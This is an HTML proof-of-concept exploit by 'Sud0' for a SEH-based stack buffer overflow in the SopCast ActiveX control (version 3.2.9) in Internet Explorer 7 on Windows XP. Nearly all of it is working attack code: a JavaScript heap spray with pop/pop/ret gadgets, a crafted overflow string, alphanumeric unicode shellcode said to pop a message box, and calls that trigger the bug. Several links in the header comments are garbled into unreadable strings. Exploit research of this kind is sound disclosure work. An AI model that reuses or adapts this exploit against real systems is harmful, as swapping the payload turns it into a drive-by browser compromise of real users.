-->
<html>
<Center>
<H1>Sopcast POC by Sud0<br></H1>
<b>Tested on XP SP3 EN on VBox with IE 7<br>
Spraying a lot to get a nice unicode usable address 0x20260078<br>
I sprayed with a set of P/P/R instructions to come back to the stack<br>
***Need internet connection on the box to trigger the vuln***<br>
Wait for the Spray to finish (IE will seem freezed for some seconds)<br>
The Sopcast control will be loaded and shown on the page<br>
wait approx 3 to 5 seconds and a message box should appear<br>
</b>
</Center>
<!--
# Exploit Title : SopCast BOF
# Date : August 10, 2010
# Author : Sud0
# Bug found by : Sud0
# Software Link : 2b8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4G2M7r3y4S2M7%4c8Q4x3X3g2U0L8$3@1`. - 6e7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2S2M7$3g2@1N6h3&6W2M7W2)9J5k6h3y4G2L8b7`.`.
# Version : 3.2.9
# OS : Windows
# Tested on : XP SP3 En (VirtualBox) Fully Patched, Internet Explorer 7
# Type of vuln : Stack Buffer Overflow - SEH
# Advisory : c2dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4G2M7X3g2D9j5h3&6Q4x3X3g2T1k6g2)9K6b7e0R3^5x3o6m8Q4x3V1k6S2k6s2k6A6M7$3!0J5K9h3g2K6i4K6u0W2M7r3S2H3i4K6y4r3K9h3c8Q4x3@1c8o6e0#2u0q4e0p5q4z5i4K6u0V1x3e0m8Q4x3X3b7H3y4e0V1`.
# Big thanks to : my wife for supporting me
# Greetz to : Corelan Security Team
# 652K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4G2M7X3g2D9j5h3&6Q4x3X3g2T1k6g2)9K6b7e0R3^5x3o6m8Q4x3V1k6A6L8X3c8W2P5q4)9J5k6i4m8Z5M7q4)9J5c8Y4y4W2j5%4g2J5K9i4c8&6i4K6u0r3j5$3!0J5k6h3I4S2L8W2)9J5k6s2c8W2j5h3#2Q4x3X3c8E0k6h3#2T1k6i4u0K6i4K6u0r3
<object classid='clsid:8FEFF364-6A5F-4966-A917-A3AC28411659' id='boom' ></object>
<script>
// ######################################### Begin of spraying with (nops + Pop/Pop/Ret) instructions to come back to the stack
var nops = unescape("%49%41"); // some nice nops on ECX
var ppr = unescape("%49%58%49%58%49%c3"); // Pop EAX / pop EAX / Ret
var ppraddy = 0x20260078;
var BlockSize = 0x200000;
var BlockHeaderSize = 0x26;
var PPRSize = 0x6;
var nopSize = BlockSize - (PPRSize + BlockHeaderSize);
var heapBlocks = (ppraddy+BlockSize*2)/(BlockSize*2);
var Spray = new Array();
while (nops.length<nopSize)
{
nops += nops;
}
nops = nops.substring(0,nopSize);
for (i=0;i<heapBlocks;i++)
{
Spray[i] = nops + ppr;
}
// ######################################### end of spraying
var buffSize = 522; // (516 + 6 = sop:// )offset to overwrite EIP
var x="sop://";
while (x.length<buffSize) x += unescape("%41");
x+=unescape("%41");
x+=unescape("%41");
x+=unescape("%87"); //low unicode bytes of seh destination address 0035 (0x20260087)
x+=" "; //High unicode bytes of seh destination address 2026 (0x20260087)
x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49");
x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A");
x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49");
x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%52%49%c3");
// some junk before shellcode
for (i=0;i<330;i++)
{
x+=unescape("%41");
}
// messagebox shellcode
x+="RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIA";
x+="IQI111AIAJQYAZBABABABABkMAGB9u4JBfyjK3kXYRTLdKDNQyBx2pzlqGYS4DKPqlpBkQfzl2kpvMLTKq6LH4KqnmP";
x+="TKMfNXNoLXrUL3Ny9qXQKOYQc0bkplo4nDrk15oLTKPTKUD8KQXj2kMzlX4K1JkpyqjK7sp7OY4KMdtKKQZNLqIomaw";
x+="PilVLRdWPBTlJ6a6olMJawWHil1YoKOKOmk3LKtMXSEgnRkojO4YqZK0fBkzlpKRkqJKlm1JKdKitRkkQxhe9oTLdML";
x+="31es6RKXKywdsY9UCYfbOx2npNZnzLpR8h5LkOKOkOQyQ5kT5kSNj8yRBSSWmLo4nrxhdKKOKOKOe9oUkXoxRLplMPK";
x+="O1XLsnRnNs41Xaet3REbRQx1LmTkZSYK6pVKOPULDqyWRPPWKSxg2Nm5lQwklktPRYXqN9okOYo38PlaQPnQH2HPCrO";
x+="2RqUNQ9KrhqLMTlG1yGsQXnPpXkpKp1XKpNs45s4OxQTmPOrQiQXpoOysDouQXMucHRPPllqWYrhPLktKaQy7qNQ6rN";
x+="rpSpQqBkOvpNQgPB0ioNuyxkZA";
// some junk after shellcode
for (i=0;i<40000;i++)
{
x+=unescape("%41");
}
// calling the boom
boom.ChannelName=x; // setting channel name
boom.SetSopAddress(x); // getting address to trigger the boom
</script>
</html>
